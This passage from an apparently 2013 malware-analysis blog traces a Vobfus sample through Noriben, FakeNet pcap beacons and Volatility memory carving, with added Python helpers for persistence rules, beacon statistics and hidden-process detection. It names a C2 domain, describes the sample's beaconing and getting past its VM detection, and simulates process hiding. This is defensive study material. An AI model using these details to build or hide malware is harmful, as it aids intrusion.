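            note = "autorun value points into a user-writable directory" if USER_WRITABLE.search(data) else ""
            fake = lookalike(data)
            if fake:
                note = (note + "; " if note else "") + f"lookalike name {fake!r}"
            findings.append(("run_key_persistence", proc, path, note))
        if op == "Process Create":
            child = basename(path)
            if child in WATCHED_CHILDREN and proc.lower() not in WATCHED_CHILDREN[child]:
                findings.append(("unusual_parent", proc, path, f"{child} spawned by {proc}"))
    return findings


if __name__ == "__main__":
    for rule, proc, path, note in scan_procmon_csv(SAMPLE_CSV):
        print(f"[{rule}] {proc}: {path} {note}")
```

Run against a real export, the three rules fire on exactly the rows this post calls out; the legitimate explorer.exe-launched iexplore.exe and the genuine Adobe Reader registry write in the constructed data are left alone, which is the check you want before turning a rule like this into an alert.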
<br />
<a href="http://www.blogger.com/blogger.g?blogID=5498034097070054412" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>The network traffic section of the Noriben report is quite telling. We see what looks like the result of a local API call beaconing to FakeNet, and then we see the results of the call to iexplore.exe that was generated when the sample was run. Lets get a better look at the .pcap generated by FakeNet.<br />
<br />
Browsing the pcap file there is a DNS query for omcxasm(dot)myftp.org [which was intercepted by FakeNet, w00t]. Since the sample believes it has resolved its C2 domain (in fact, it is being routed to localhost) it begins phoning home over TCP port 1866. Over the course of 5 minutes we see 8 beacons to the C2 domain: the first, second, fourth, sixth, and eighth beacons contain 159 bytes of TCP data consisting of "New" (likely a status of the malware), the local IP of the host, hostname, logged-in user name, Windows version, version of the malware (in this case 1.3), status of the process (perhaps), and some additional encoded data. The third, fifth, and seventh beacons contain 318 bytes of data, which appears to be the same payload repeated twice, most likely two consecutive sends coalesced into one segment by the TCP stack, so the effective beacon count is higher than the segment count. We also see the source port changing with every connection: TCP 1472, 1728, 1984, 2240, 2496, 2752, 3008, and finally 3264, a step of exactly 256 each time. The destination port of TCP 1866 stays constant. Pretty interesting behavior!<br />
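The beacon statistics above were read off the capture by hand. The following is an added example (not from the original post and not FakeNet or Noriben code) that does the same job from a pcap with only the Python standard library: it parses Ethernet/IPv4/TCP records, groups data-bearing segments by destination, and reports payload sizes, the source-port walk, inter-beacon intervals, and segments that are really two identical beacons coalesced into one. The capture is constructed to mirror the numbers in the post (eight segments to TCP/1866 from source ports stepping by 256, 159-byte and 318-byte payloads, destination 127.0.0.1 as FakeNet would see it); the beacon contents, timing and host details are placeholders, not the real traffic.

```python
"""Pull beacon statistics out of a FakeNet pcap with only the standard library.

Added example, not from the original post and not FakeNet/Noriben code.  Reads a
classic pcap (Ethernet/IPv4/TCP), groups segments that carry data by
destination, and reports payload sizes, the source-port walk, the interval
between beacons, and segments that are two identical beacons coalesced into one.
The capture is constructed to mirror the post's numbers; it is not the real one.
"""
import struct
from collections import defaultdict

LINKTYPE_ETHERNET = 1


def _ipv4_tcp(src_ip, dst_ip, sport, dport, payload):
    """Build Ethernet+IPv4+TCP bytes (checksums left zero; fine for offline parsing)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_constructed_pcap():
    """Eight beacons over five minutes, shaped like the post describes (constructed data)."""
    beacon = (b"New|192.168.1.100|WORKSTATION|user|Windows XP|1.3|idle|" + b"A" * 120)[:159]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    sport, ts = 1472, 1000
    for i in range(8):
        payload = beacon * 2 if i in (2, 4, 6) else beacon   # 3rd, 5th, 7th are doubled
        frame = _ipv4_tcp("192.168.1.100", "127.0.0.1", sport, 1866, payload)
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
        sport += 256
        ts += 40
    return out


def tcp_payloads(pcap):
    """Yield (timestamp, src_ip, sport, dst_ip, dport, payload) for data-bearing TCP segments."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    linktype, = struct.unpack_from(endian + "I", pcap, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        ts_sec, ts_usec, incl, _orig = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl]
        off += 16 + incl
        if frame[12:14] != b"\x08\x00":          # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len, = struct.unpack_from("!H", ip, 2)
        if ip[9] != 6:                           # not TCP
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (ts_sec + ts_usec / 1e6, ".".join(map(str, ip[12:16])), sport,
                   ".".join(map(str, ip[16:20])), dport, payload)


def split_coalesced(payload):
    """A segment that is one payload repeated twice is two beacons coalesced by the stack."""
    half = len(payload) // 2
    if half and payload[:half] == payload[half:]:
        return [payload[:half], payload[half:]]
    return [payload]


def beacon_report(pcap):
    """Per destination: segment/beacon counts, payload sizes, source-port deltas, intervals."""
    flows = defaultdict(list)
    for ts, _src, sport, dst, dport, payload in tcp_payloads(pcap):
        flows[(dst, dport)].append((ts, sport, payload))
    report = {}
    for (dst, dport), segs in flows.items():
        segs.sort()
        times = [s[0] for s in segs]
        ports = [s[1] for s in segs]
        beacons = [b for s in segs for b in split_coalesced(s[2])]
        report[f"{dst}:{dport}"] = {
            "segments": len(segs),
            "beacons": len(beacons),
            "payload_sizes": sorted({len(s[2]) for s in segs}),
            "source_ports": ports,
            "port_deltas": sorted({b - a for a, b in zip(ports, ports[1:])}),
            "intervals_s": [round(b - a, 1) for a, b in zip(times, times[1:])],
        }
    return report


if __name__ == "__main__":
    for dest, stats in beacon_report(build_constructed_pcap()).items():
        print(dest, stats)
```

A constant destination port, a single repeated payload size and a regular interval are the three properties a network detection for this family would key on; the source-port step is a bonus fingerprint, and counting coalesced beacons separately keeps the cadence estimate honest.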
<br />
<u><b>Malwr Report and Summary</b></u><br />
<br />
Here's the malwr report: <a href="https://malwr.com/analysis/Nzc0M2I0N2UzYWE5NDllYTk2NDY4N2RhOTIzNjFhNjc/">clicky</a><br />
<br />
What did we miss? Besides the mutexes created by the dropped process, and an unusual html file (xxx.html), it looks like static analysis, Noriben.py, and FakeNet did a pretty good job of building a profile of both network and host based indicators!<br />
<br />
Below is a summary [Apologies about the quality] of the process flow using <a href="http://www.cert.at/downloads/software/procdot_en.html">ProcDot</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhotd_a8-FveI-jf1E3ZAPByY0XOdeFL9ufMOICmnrssnM28Q90rIZS6y_MaXgblTwO_nt7qBnUC41WCnvFopXJrdTgRIzmtduv_U7i926Yv4rchFcbYK0eh9dBBbiSjztGuI6ywqpYp4QA/s1600/9MalwareFlow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhotd_a8-FveI-jf1E3ZAPByY0XOdeFL9ufMOICmnrssnM28Q90rIZS6y_MaXgblTwO_nt7qBnUC41WCnvFopXJrdTgRIzmtduv_U7i926Yv4rchFcbYK0eh9dBBbiSjztGuI6ywqpYp4QA/s400/9MalwareFlow.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbBqGCW6TJ6hK6aJqjR-CufeVRksU2KCRytIhXO8dluKTlDpGBogA9Pl3RSfHgevzFO4HuCX8Hp2JYK5mPKbqxQ-fOdN1sxWDmqZftCmFgCgdB_b2Rp-pd9u19ddOPNnxWgXj3bSX0_ueG/s1600/9MalwareFlow.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Posted by Anonymous (http://www.blogger.com/profile/07700158074972140726)

Memory Games - Volatility (2013-03-15)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I had a brief introduction to memory forensics, or rather I was pushed into exploring the topic after an interesting conversation with Micrmsoft's own Allison Nixon.<br />
<br />
Allison had come across a malware sample that was thwarting both execution in a VM and static code analysis. It was evident, after IDA began to loop on a large block of code, that this particular sample was packed. This was confirmed with a quick strings search: besides the Visual Basic runtime's ASCII strings, there was nothing readable, so there was no way to analyze this sample without patching out the packer's decryption routine. Unfortunately, neither of us is at a point where we can handle that just yet, so we threw some ideas around. Prior to roping me in, while closely observing the sample (redacted), she discovered the means by which the VM detection was functioning. After removing the registry entry that was observed (more info to come in a blog from Allison) the sample successfully executed and the VM was infected!<br />
<br />
With the sample active in a controlled environment, I suggested that a memory snapshot of the VM could be used to carve a copy of the unpacked sample for local static analysis. This would let us bypass the packer entirely, since the code has to be decrypted in memory before it can run. The awesome thing about VM environments, and VMware Workstation (<a href="http://www.vmware.com/products/workstation">http://www.vmware.com/products/workstation</a>/) in particular, is that taking a snapshot writes the guest's physical memory out to a ".vmem" file. That file is a raw memory image, the same format you would get by imaging RAM from a live system with dd (<a href="http://www.forensicswiki.org/wiki/Tools:Memory_Imaging">http://www.forensicswiki.org/wiki/Tools:Memory_Imaging</a>), so the open source Volatility Framework (<a href="https://www.volatilesystems.com/default/volatility">https://www.volatilesystems.com/default/volatility</a>) can read it directly. After taking a snapshot of the infected VM to generate the .vmem file I needed, I fired up SIFT (freely provided by SANS <a href="http://computer-forensics.sans.org/community/downloads">here</a>) to begin my search for the nastiness.<br />
<br />
<br />
After mounting the folder containing the memory sample as a read-only shared folder in the SIFT VM, it was time to confirm the correct profile for analyzing this particular memory sample, using Volatility's imageinfo plugin:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyy2DrF6puC_De7Qq_5kHaJXrFDjiODT44b60eUa7qJN2Yrurwh31r9HESvkQa36lGj8rh5VKn678v2U7OI8hgqhyphenhyphenHcSqMlZqy0davtyhif-vm52gIc8IiXI2XB8aJhmNsmLTpVgG_hsRh/s1600/CaptureItPlus634989559698555912.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyy2DrF6puC_De7Qq_5kHaJXrFDjiODT44b60eUa7qJN2Yrurwh31r9HESvkQa36lGj8rh5VKn678v2U7OI8hgqhyphenhyphenHcSqMlZqy0davtyhif-vm52gIc8IiXI2XB8aJhmNsmLTpVgG_hsRh/s640/CaptureItPlus634989559698555912.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
There's a fair amount of information here, but of primary importance is the "Suggested Profile(s)" field, which tells you which profile (operating system version, service pack and architecture) to pass to every other plugin with --profile. In this case the infected host was Windows XP SP3 32-bit (x86), and we can see that reflected in the screenshot above. Armed with that information, we can now dive into the memory sample. First up, a listing of processes.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMStDqcBYIGTohtxmCE75bxDlwcrb-GDyC4ZlMWIg3NN7aEwunQfPQ874WHfFulCc1llgK9JEElghPyIBqpmfFopgxP18tT-LhR3R_pyR7LoyawygGISn3vLVaiLJATjUVzzc-RyrXw5w/s1600/CaptureItPlus634989586341149781.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMStDqcBYIGTohtxmCE75bxDlwcrb-GDyC4ZlMWIg3NN7aEwunQfPQ874WHfFulCc1llgK9JEElghPyIBqpmfFopgxP18tT-LhR3R_pyR7LoyawygGISn3vLVaiLJATjUVzzc-RyrXw5w/s640/CaptureItPlus634989586341149781.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I have opted to use the psscan plugin to enumerate processes by pool tag scanning. According to MSDN: "The pool tag is a mechanism for identifying the driver or other part of the kernel allocated to a particular portion of memory (<a href="http://technet.microsoft.com/en-us/library/cc958284.aspx">Source</a>)." Rather than walking the kernel's linked list of active processes as pslist does, psscan carves _EPROCESS structures straight out of physical memory by their pool tag, so processes that have been terminated, or that were unlinked from the list to hide them, show up as well. This particular sample doesn't appear to hide itself very well, as we see that the second listed process (PID 3884) looks a bit unusual (name redacted). Of additional concern is PID 3896, which was identified as suspicious while the infection process was observed. From here on out, our primary concern will be the investigation of PID 3884, as it appears to be the same executable that we were unable to perform static analysis upon.</div>
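To make the psscan-versus-pslist distinction concrete, here is an added example (not the post's code and not part of Volatility) that parses the text output of both plugins and classifies each process as hidden (in psscan but not pslist, with no exit time), exited (in psscan with an exit time), or orphaned (parent no longer present). The two listings are constructed in the layout of Volatility 2.x output, with invented offsets, names and times; "sample.exe" stands in for the redacted process name, and which PIDs come out as hidden or exited is a property of the constructed data, not a claim about the real sample.

```python
"""Cross-check Volatility psscan against pslist to separate hidden, exited and odd processes.

Added example, not from the original post and not Volatility code.  pslist walks
the kernel's linked list of active processes; psscan carves _EPROCESS pool
allocations out of physical memory.  Anything psscan finds that pslist does not
is therefore either a process that exited or one unlinked to hide it.  Both
listings below are constructed in the shape of Volatility 2.x text output.
"""
import re

PSLIST = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x823c89c8 System                    4      0     53      240 ------      0
0x81f60da0 smss.exe                368      4      3       19 ------      0 2013-03-15 20:00:01 UTC+0000
0x81e3b4d8 csrss.exe               584    368     9      326      0      0 2013-03-15 20:00:02 UTC+0000
0x81e0b020 explorer.exe           1464   1400    11      385      0      0 2013-03-15 20:01:10 UTC+0000
0x81d2a6b0 sample.exe             3884   1464     2       61      0      0 2013-03-15 20:05:40 UTC+0000
"""

PSSCAN = """\
Offset(P)          Name                PID   PPID PDB        Time created                   Time exited
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x00000000023c89c8 System                4      0 0x00319000
0x0000000001f60da0 smss.exe            368      4 0x0a5c0020 2013-03-15 20:00:01 UTC+0000
0x0000000001e3b4d8 csrss.exe           584    368 0x0a5c0040 2013-03-15 20:00:02 UTC+0000
0x0000000001e0b020 explorer.exe       1464   1400 0x0a5c0060 2013-03-15 20:01:10 UTC+0000
0x0000000001d2a6b0 sample.exe         3884   1464 0x0a5c0080 2013-03-15 20:05:40 UTC+0000
0x0000000001c11a90 sample.exe         3896   3884 0x0a5c00a0 2013-03-15 20:05:41 UTC+0000
0x0000000001b07340 cmd.exe            3720   3884 0x0a5c00c0 2013-03-15 20:05:42 UTC+0000 2013-03-15 20:05:43 UTC+0000
"""

# Offset, name, PID, PPID open every row in both plugins; names with spaces are not handled.
ROW = re.compile(r"^0x[0-9a-fA-F]+\s+(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)")
STAMP = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC[+-]\d{4}")


def parse_listing(text):
    """Map PID -> {name, ppid, exited} from a pslist/psscan text dump."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue                     # header, separator or blank line
        stamps = STAMP.findall(line)     # two timestamps means an exit time is present
        procs[int(m["pid"])] = {"name": m["name"], "ppid": int(m["ppid"]),
                                "exited": len(stamps) == 2}
    return procs


def cross_check(pslist_text, psscan_text):
    """Classify processes by where they appear and whether they left an exit time."""
    listed, scanned = parse_listing(pslist_text), parse_listing(psscan_text)
    hidden, exited = [], []
    for pid, info in scanned.items():
        if pid in listed:
            continue
        (exited if info["exited"] else hidden).append(pid)
    # A live process whose parent is gone.  On XP this is normal for explorer.exe
    # (userinit.exe exits after logon) but worth a look for anything else.
    orphans = [pid for pid, info in scanned.items()
               if not info["exited"] and info["ppid"] != 0 and info["ppid"] not in scanned]
    return {"hidden": sorted(hidden), "exited": sorted(exited),
            "orphan_parent": sorted(orphans), "only_in_pslist": sorted(set(listed) - set(scanned))}


def process_tree(psscan_text, root_pid):
    """Descendants of root_pid from the scan as (depth, pid, name); handy for a sample's children."""
    scanned = parse_listing(psscan_text)
    out, stack = [], [(0, root_pid)]
    while stack:
        depth, pid = stack.pop()
        for child, info in sorted(scanned.items()):
            if info["ppid"] == pid:
                out.append((depth + 1, child, info["name"]))
                stack.append((depth + 1, child))
    return out


if __name__ == "__main__":
    print(cross_check(PSLIST, PSSCAN))
    for depth, pid, name in process_tree(PSSCAN, 3884):
        print("  " * depth + f"{name} ({pid})")
```

The same diff is what you would run by hand with pslist and psscan side by side; scripting it matters once the image has a few hundred processes, and the exit-time column is what keeps a normally terminated cmd.exe from being reported as "hidden".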
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7Gc2nil0XkDZOmQQYHipLUk1YGYMXkZXqWghT9lojm3IbQd-X8pSGobv1rjt6a61z2e_nzAHaT3cHNQaO1vZu1VoCk0VwGWogpLE3aM7Fyz03Jol6oj1G6ixtFoh8dVm7OKOGImQZacZ/s1600/CaptureItPlus634989621369833307.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT7Gc2nil0XkDZOmQQYHipLUk1YGYMXkZXqWghT9lojm3IbQd-X8pSGobv1rjt6a61z2e_nzAHaT3cHNQaO1vZu1VoCk0VwGWogpLE3aM7Fyz03Jol6oj1G6ixtFoh8dVm7OKOGImQZacZ/s640/CaptureItPlus634989621369833307.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before we dive in deeper, let's see whether there are open network connections (all protocols) associated with PID 3884, using the sockscan plugin. The answer looks like no, at least at the time the snapshot was taken. Volatility has several other plugins for network activity (connscan for TCP connections on XP, for example), but in this instance they are unnecessary.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghwovb51rjEFSwJPCewsjLKnDELIdoiPJm7dCdV_GkdvOfMwdNK1pzgWMC3iyOf336xrj1w7v3AWZO6csl57c6dN-k4r6eXc7ljDvFFOleGIXt8KszRucafjC0eCdXzYxNkOltZrzArItZ/s1600/CaptureItPlus634989624164523154.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghwovb51rjEFSwJPCewsjLKnDELIdoiPJm7dCdV_GkdvOfMwdNK1pzgWMC3iyOf336xrj1w7v3AWZO6csl57c6dN-k4r6eXc7ljDvFFOleGIXt8KszRucafjC0eCdXzYxNkOltZrzArItZ/s640/CaptureItPlus634989624164523154.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sample output from command: <span style="font-size: x-small;">vol.py -f Desktop/VMware-Shared-Drive/D2/D2-Snapshot5.vmem dlllist -p 3884 --profile=WinXPSP3x86</span></td><td class="tr-caption"><br /></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
Next, let's try to get a little more information about PID 3884 by looking at the process's loaded DLLs with dlllist. From the snippet above we see a number of loaded DLLs, including "urlmon.dll" (home of URLDownloadToFile) and "mswsock.dll" (the Winsock service provider), which suggest this sample can communicate over the network. However, we saw no sockets via the sockscan plugin. I suspect that at the time this .vmem file was generated there wasn't any network connectivity (the VM was isolated from the internet, with no emulated services), so the sample's own connectivity checks failed before it opened anything.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj48B1OQcUIFj6NcmPJ5xvx69ip0sZBpF2ziKMaamhPDBBa_p4xb325bz_kEXbdL-27n_b96Ji95wSWjK9h4d0ipGkrXokN8IffyBbmw-z05YtYouo7A2X6HKsnYHuYo8-sdgElMNRSPNrx/s1600/procexedump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj48B1OQcUIFj6NcmPJ5xvx69ip0sZBpF2ziKMaamhPDBBa_p4xb325bz_kEXbdL-27n_b96Ji95wSWjK9h4d0ipGkrXokN8IffyBbmw-z05YtYouo7A2X6HKsnYHuYo8-sdgElMNRSPNrx/s640/procexedump.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally, let's extract PID 3884 as an .exe, which was our original goal. By specifying the PID (-p) and an output directory (--dump-dir), Volatility's procexedump plugin reconstructs the process's executable from memory and names the output after the PID it was sourced from. The new executable has a different hash from the original file, as expected: what comes out of memory is the image as it was mapped and run (unpacked, relocated, with the import table already filled in by the loader), not the bytes that were on disk: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQEuaK-sdZY0-XV4lfseJ1e3_Pn0irKMWaF27v4MxIJdVHShgTfIHabh1_qdxMYcotBTUxbJLTzVhIfdctj7YPuEzvoUzqkG1x8ZiebQAv81ktq3su4tih_Pj4s56IF1LGP0jHJkRQtBR/s1600/CaptureItPlus634989632125148476.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSQEuaK-sdZY0-XV4lfseJ1e3_Pn0irKMWaF27v4MxIJdVHShgTfIHabh1_qdxMYcotBTUxbJLTzVhIfdctj7YPuEzvoUzqkG1x8ZiebQAv81ktq3su4tih_Pj4s56IF1LGP0jHJkRQtBR/s400/CaptureItPlus634989632125148476.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Lets check VirusTotal before we go any further.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXYsWC3Iuuyx3JltGxPfYJcdQzhWb6j9_5Si5zrMrQWMo190G1uGx0ZgnbafdrgQNVfTRwH17iQthxXZfK2ECglXMeKXPkF7t09XtyDJ8y45eetakxL-jovoxVbW_usxAyY7xYEZ3W6COG/s1600/CaptureItPlus634989633053071550.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXYsWC3Iuuyx3JltGxPfYJcdQzhWb6j9_5Si5zrMrQWMo190G1uGx0ZgnbafdrgQNVfTRwH17iQthxXZfK2ECglXMeKXPkF7t09XtyDJ8y45eetakxL-jovoxVbW_usxAyY7xYEZ3W6COG/s400/CaptureItPlus634989633053071550.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now to compare it against the original file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
That is a pretty substantial difference in detection! The original sample, where it is identified at all, is labelled as a dropper component, whereas the sample extracted from memory is identified by numerous vendors as a variant of Vobfus (aka W32/Autorun, Changeup). Pretty cool! We have successfully extracted a sample and worked around its protection mechanism by using the Volatility framework. We also got additional information from the dlllist plugin, as static analysis of the original file was unable to enumerate the PE imports. One caveat: a PE dumped from memory is not guaranteed to run again or to have a clean import table, so treat it as an artifact for hashing and static analysis rather than as a drop-in replacement for the original file.</div>
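<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
To make the pslist/psscan distinction concrete, here is an added toy example, not code from this post and not Volatility's code: a constructed "memory image" holding process records with an invented, simplified layout (pool tag, PID, list links, name), one of which has been unlinked from the active-process list the way a DKOM rootkit would hide it. Walking the list misses it; scanning every pool-aligned offset for the tag finds it. The record layout, offsets, tag, PIDs and names are all assumptions for illustration (the PID 3884 is borrowed from the post); the real _POOL_HEADER and _EPROCESS structures are larger and version specific.</div>

```python
"""Toy model of pslist (walk the active-process list) vs psscan (scan for pool tags).

Constructed example: the 'memory image' below is a bytearray with an invented,
simplified record layout. Only the two enumeration strategies are meant to be real.
"""
import struct

POOL_TAG = b"Proc"                       # tag on process-object pool allocations (assumed)
POOL_ALIGN = 8                           # kernel pool allocations are 8-byte aligned on x86
# invented record: pool size fields | pool tag | pid | flink | blink | name[16]
REC = struct.Struct("<4s4sIII16s")
HIDDEN_PID = 3884                        # the post's PID, standing in for an unlinked process


def build_image(size=4096):
    """Lay out four process records; unlink pid 3884 from the list like a DKOM rootkit would."""
    procs = [(0x100, 4, b"System"), (0x200, 608, b"csrss.exe"),
             (0x300, HIDDEN_PID, b"evil.exe"), (0x400, 1120, b"explorer.exe")]
    head = 0x080                         # analogue of PsActiveProcessHead
    image = bytearray(size)
    ring = [head] + [off for off, pid, _ in procs if pid != HIDDEN_PID]

    def links(off):                      # (flink, blink) for a record that is in the ring
        i = ring.index(off)
        return ring[(i + 1) % len(ring)], ring[(i - 1) % len(ring)]

    image[head:head + REC.size] = REC.pack(b"\0\0\0\0", b"Head", 0, *links(head), b"")
    for off, pid, name in procs:
        fl, bl = links(off) if off in ring else (off, off)   # unlinked: points at itself
        image[off:off + REC.size] = REC.pack(b"\0\0\0\0", POOL_TAG, pid, fl, bl, name)
    return image, head


def walk_list(image, head):
    """pslist-style: follow Flink from the list head until it wraps around (or loops)."""
    found, seen = [], set()
    off = REC.unpack_from(image, head)[3]
    while off != head and off not in seen:
        seen.add(off)
        _, _, pid, flink, _, name = REC.unpack_from(image, off)
        found.append((pid, name.rstrip(b"\0").decode()))
        off = flink
    return found


def scan_pool(image):
    """psscan-style: ignore the list; test every aligned offset for the pool tag,
    then apply cheap plausibility checks to weed out false positives."""
    found = []
    for off in range(0, len(image) - REC.size + 1, POOL_ALIGN):
        if image[off + 4:off + 8] != POOL_TAG:
            continue
        _, _, pid, flink, blink, name = REC.unpack_from(image, off)
        name = name.rstrip(b"\0")
        if pid == 0 or not name or not name.isascii() or max(flink, blink) >= len(image):
            continue
        found.append((pid, name.decode()))
    return found


def hidden_processes(image, head):
    """What the scan sees that the list walk does not: unlinked (or exited) processes."""
    return sorted(set(scan_pool(image)) - set(walk_list(image, head)))


if __name__ == "__main__":
    img, head = build_image()
    print("pslist:", walk_list(img, head))
    print("psscan:", scan_pool(img))
    print("hidden:", hidden_processes(img, head))
```

<div class="separator" style="clear: both; text-align: left;">
The plausibility checks in scan_pool are the important detail: a tag match alone produces false positives on junk or freed memory, so the real plugin validates several fields of each candidate before reporting it, which is also why psscan can list processes that exited long ago.</div>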
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com1tag:blogger.com,1999:blog-5498034097070054412.post-30482329280854658912013-02-24T17:49:00.001-08:002013-02-24T17:49:46.741-08:00Malware Analysis 101 [Part 3]<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Finally, here's the concluding portion of Malware Analysis 101. Both previous posts can be found <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-1.html">here [Part 1]</a> and <a href="http://micrmsoft.blogspot.com/2013/02/malware-analysis-101-part-2.html">here [Part 2]</a>.<br />
<br />
<a name='more'></a><br />
<u>Hashing:</u><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxbk8xntUmv9CzKvrIdtI2UbHnqdWh3mASAlKVKQz_FFe16XObfv84VzIEpp4kT0i5erYitmTogu01ttHzWbk1Ai5FgSSyTxURmcjlaZ21ZMTwzXc6nrqp7-bUe4VkcH9pNH4lhzXT7a2v/s1600/Slide13.PNG" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxbk8xntUmv9CzKvrIdtI2UbHnqdWh3mASAlKVKQz_FFe16XObfv84VzIEpp4kT0i5erYitmTogu01ttHzWbk1Ai5FgSSyTxURmcjlaZ21ZMTwzXc6nrqp7-bUe4VkcH9pNH4lhzXT7a2v/s320/Slide13.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><a href="http://opinit.files.wordpress.com/2010/07/digital-fingerprint.jpg">Image Source</a></td></tr>
</tbody></table>
